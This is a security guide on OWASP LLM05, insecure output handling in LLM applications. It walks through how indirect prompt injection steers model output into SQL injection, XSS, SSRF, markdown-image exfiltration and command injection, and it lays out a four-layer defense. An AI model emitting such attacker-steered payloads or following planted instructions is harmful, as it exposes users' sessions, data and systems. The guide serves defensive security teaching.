Insecure Output Handling in LLMs (OWASP LLM05): Examples and Prevention
Insecure output handling is OWASP LLM05: the failure that happens when downstream code trusts an LLM's output the way it would never trust user input. Worked examples of SQL injection, XSS, SSRF, and command injection via LLM, plus the four-layer prevention stack.
Security engineers spent twenty-five years learning one rule: do not trust input. Then large language models arrived, and teams that would never concatenate a URL parameter into a SQL query started piping raw model output straight into one. That failure has a name in the OWASP Top 10 for LLM Applications: LLM05, Insecure Output Handling. This guide explains exactly what it is, walks four worked examples of how it gets exploited, and lays out the prevention stack that actually closes it.
If you would rather learn by breaking something, the Insecure Output Handling module runs these attacks against a live target. Read this first for the model; go there to practice.
What insecure output handling is
Insecure output handling is the vulnerability that emerges when a downstream system consumes an LLM's output without treating that output as untrusted. The one-line version: the model is not a trusted component of your stack, even when it feels like one.
The longer version is more useful. An LLM is a text generator with an enormous attack surface upstream of its output. Anything in that upstream surface that an attacker can influence, the system prompt, the user message, retrieved documents, tool responses, the web pages an agent browses, can shape the output into whatever form the attacker wants. The model is, in effect, a configurable way to turn attacker intent into developer-consumed text. If your downstream code trusts that text, the attacker controls your downstream code.
This is distinct from prompt injection, though the two are constantly confused. Prompt injection is about getting the model to produce something it should not. Insecure output handling is about what your code does with whatever the model produced. Prompt injection is the upstream trigger; insecure output handling is the downstream detonation. They compose into the most common high-severity LLM incident pattern, which is covered below.
Why LLM output must be treated as untrusted
Web developers internalized "untrust user input" through a painful decade of SQL injection and reflected XSS. But the lesson was taught narrowly: user input is untrusted. The corollary got less airtime: anything shaped by untrusted input is also untrusted.
LLM output lives exactly inside that corollary. The user's chat message is obviously untrusted. The model's response, which was shaped by that message and by every retrieved document and tool output in the context window, is equally untrusted. But it feels different. It arrives from an API your team pays for, wrapped in an SDK your team imports, produced by an engine you mentally filed under "backend." The surface cue that normally fires the untrusted reflex, an input box, a URL parameter, a form field, is missing. So the reflex does not fire, and the output flows downstream like any internal value.
State the correct model plainly: if the LLM's context window contains any attacker-influenceable text, every byte of the LLM's output is attacker-influenceable text. That condition holds for essentially every production LLM application. Which means the output is untrusted in essentially every production LLM application.
Insecure output handling examples
The vulnerabilities that emerge are not new. They are the classic web-security top ten, reintroduced through a new entry vector. Here are the four that show up most often, with the mechanism for each.
SQL injection via LLM
An agent is asked to turn a natural-language request into a database query. It does. The query executes. But attacker-controlled content upstream, say an indirect-injection payload buried in a document the agent was told to analyze, steered the generated SQL to include a UNION SELECT against a table the agent should never touch. The query ran under the agent's service credentials, which have broad read access because convenient tooling tends to accumulate broad permissions. Data no user was authorized to see is now in the model's next response.
The root cause is not that the model "decided" to attack the database. It is that an engineer wrote the equivalent of cursor.execute(llm_response) without applying the parameterization discipline they would apply to any other untrusted SQL source.
XSS via LLM
The chat UI renders the model's response as markdown or HTML. An attacker steers the output to contain a <script> tag, an <img onerror=...> handler, or the markdown-image equivalent pointing at an attacker-controlled URL. The victim opens the chat, the payload executes inside their authenticated session, and session tokens, CSRF tokens, and page PII are exfiltrated before the tab closes. This is stored XSS with the model as the storage and delivery mechanism.
SSRF and data exfiltration via LLM
An agent can fetch URLs, or its UI auto-loads images from the markdown it renders. The attacker gets the model to emit a URL pointing at an internal service (http://169.254.169.254/... for cloud metadata, or an internal admin endpoint) or at an attacker server with stolen data in the query string. The fetch happens from inside your trust boundary. The markdown-image variant is the quietest and most common exfiltration channel in LLM apps; it has its own walkthrough in the markdown image exfiltration guide.
Command injection via LLM
An agent with a code-execution or shell tool generates a command from a template that includes model output. Attacker-influenced output injects command-substitution syntax or a chained ; rm -rf style payload. The command runs with the agent's privileges. This is the same failure as SQL injection, one consumption surface over, and it is increasingly common as agents gain "run this" capabilities. The tool abuse guide covers the tool-boundary version in depth.
How it composes with prompt injection
Neither attack class is maximally dangerous alone. Together they are the canonical high-severity LLM incident:
- Indirect prompt injection plants the instruction. An attacker hides text in a document, web page, or email the agent will process.
- The model follows it and produces attacker-chosen output (a malicious SQL fragment, an exfiltration URL, a script tag).
- Insecure output handling detonates it. Downstream code consumes that output without sanitization, and the attack lands.
This is why fixing only one half leaves you exposed. You cannot reliably stop the model from emitting bad output (prompt injection has no complete fix), so you must treat the output as untrusted at every consumption site. Output handling is the layer you actually control. See the indirect prompt injection guide for the upstream half and the OWASP LLM Top 10 annotated for how these categories interlock.
How to prevent insecure output handling
There is no single switch. The defense is a four-layer stack, applied at the boundaries where output is produced and consumed.
-
Structured output at the model boundary. Where the use case allows, force the model into a constrained schema (JSON schema, function-calling, tool-use) instead of free text. This shrinks the attack surface from "arbitrary string" to "values inside a typed shape." It does not close the class by itself, because the values inside the structure are still attacker-influenceable, but it removes whole categories of payload.
-
Schema validation after generation. Validate the structured output against a strict schema before anything consumes it. Reject anything that does not conform. Treat a validation failure as a security event, not a retry-quietly event.
-
Context-appropriate escaping at the consumption site. This is the load-bearing layer. Parameterize SQL. Escape HTML for the exact rendering context. Allowlist URL schemes and hosts before any fetch or image load. Never pass model output to a shell. The rule is identical to classic injection defense: escape for the destination, at the destination, every time.
-
Sanitization of any free-text surface rendered to a user. If model output is shown as markdown or HTML, run it through a hardened sanitizer that strips scripts, event handlers, and external resource loads (including markdown images pointing off-domain) unless you have an explicit reason to allow them.
The mental shortcut that prevents most of these bugs: wherever you consume LLM output, ask what you would do if that exact value came from a hostile user typing into a form. Do that. If the answer is "parameterize it," parameterize the LLM output too. If the answer is "I would never run this as a shell command," do not run the LLM's version either.
Frequently asked questions
Is insecure output handling the same as prompt injection? No. Prompt injection makes the model produce bad output. Insecure output handling is your code trusting that output. They chain, but they are fixed at different layers, and the output-handling layer is the one you fully control.
Does structured output (JSON / function calling) fix it? It helps a lot and closes some categories, but the values inside the structure are still attacker-influenceable. You still need validation and context-appropriate escaping at the consumption site.
What OWASP category is this? LLM05 in the OWASP Top 10 for LLM Applications. The full annotated list is in the OWASP LLM Top 10 guide.
How do I test my own app for it? Enumerate every place LLM output is consumed by code (not just shown to a user): database queries, shell commands, HTTP fetches, HTML renders, file writes. For each, send an output-shaped payload containing that surface's injection primitive and confirm the system sanitizes or refuses. The hands-on module walks this end to end.
Ready to exploit it yourself? The Insecure Output Handling module runs these attacks against a live agent, and the Wraith Academy drills every OWASP LLM attack class free.
Practice these techniques hands-on
14 free challenges teaching prompt injection, system prompt extraction, data exfiltration, and more.
Enter the Academy →